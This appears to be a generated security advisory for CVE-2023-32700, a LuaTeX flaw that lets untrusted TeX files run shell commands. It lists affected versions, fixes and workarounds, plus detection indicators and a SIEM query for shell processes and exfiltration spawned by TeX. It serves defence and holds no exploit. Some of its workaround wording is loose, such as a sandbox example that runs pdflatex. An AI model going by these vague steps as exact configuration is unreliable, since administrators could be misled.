CVE-2023-32700
📋 TL;DR
This vulnerability in LuaTeX allows arbitrary shell command execution when processing untrusted TeX files. Attackers can exploit this to run malicious commands on systems using vulnerable LuaTeX, TeX Live, or MiKTeX installations. Anyone compiling TeX documents from untrusted sources is affected.
💻 Affected Systems
- LuaTeX
- TeX Live
- MiKTeX
📦 What is this software?
Luatex by Luatex Project
Miktex by Miktex
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining shell access and executing arbitrary commands with the privileges of the LuaTeX process, potentially leading to data theft, ransomware deployment, or lateral movement.
Likely Case
Local privilege escalation or remote code execution in shared TeX compilation environments, academic systems, or CI/CD pipelines processing user-submitted documents.
If Mitigated
Limited impact if only trusted TeX files are processed and proper sandboxing/isolation is implemented.
🎯 Exploit Status
Exploitation requires the victim to compile a malicious TeX file. No authentication needed beyond file access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: LuaTeX 1.17.0, TeX Live 2023 r66984, MiKTeX 23.5
Vendor Advisory: https://tug.org/pipermail/tex-live/2023-May/049188.html
Restart Required: No
Instructions:
1. Update LuaTeX to version 1.17.0 or later. 2. Update TeX Live to 2023 r66984 or later. 3. Update MiKTeX to 23.5 or later. 4. Verify the update by checking version numbers.
🔧 Temporary Workarounds
Sandbox TeX compilation
allRun LuaTeX in a sandboxed environment with restricted system access
docker run --rm -v $(pwd):/workdir texlive/texlive:latest pdflatex document.tex
Disable LuaTeX shell access
allModify LuaTeX configuration to restrict shell command execution
Set os.execute = nil in LuaTeX configuration
Remove or restrict io.popen access
🧯 If You Can't Patch
- Process TeX files only from trusted sources with verified integrity.
- Implement strict input validation and sanitization for TeX file processing systems.
🔍 How to Verify
Check if Vulnerable:
Check LuaTeX version with 'luatex --version' and verify it's below 1.17.0. For TeX Live, check if version is below 2023 r66984.Check Version:
luatex --versionVerify Fix Applied:
After updating, confirm version numbers: LuaTeX >= 1.17.0, TeX Live >= 2023 r66984, MiKTeX >= 23.5.📡 Detection & Monitoring
Log Indicators:
- Unusual shell commands executed from LuaTeX process
- Suspicious TeX file compilation patterns
- Unexpected process spawns from tex/latex processes
Network Indicators:
- Outbound connections from TeX compilation processes
- Unexpected data exfiltration during document processing
SIEM Query:
Process creation where parent process contains 'luatex' or 'tex' and child process is shell or suspicious executable🔗 References
- https://github.com/TeX-Live/texlive-source/releases/tag/build-svn66984
- https://gitlab.lisn.upsaclay.fr/texlive/luatex/-/tags/1.17.0
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLY43MIRONJSJVNBDFQHQ26MP3JIOB3H/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TF6YXUUFRGBIXIIIEV5SGBJXXT2SMUK5/
- https://tug.org/pipermail/tex-live/2023-May/049188.html
- https://tug.org/~mseven/luatex.html
- https://github.com/TeX-Live/texlive-source/releases/tag/build-svn66984
- https://gitlab.lisn.upsaclay.fr/texlive/luatex/-/tags/1.17.0
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLY43MIRONJSJVNBDFQHQ26MP3JIOB3H/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TF6YXUUFRGBIXIIIEV5SGBJXXT2SMUK5/
- https://tug.org/pipermail/tex-live/2023-May/049188.html
- https://tug.org/~mseven/luatex.html
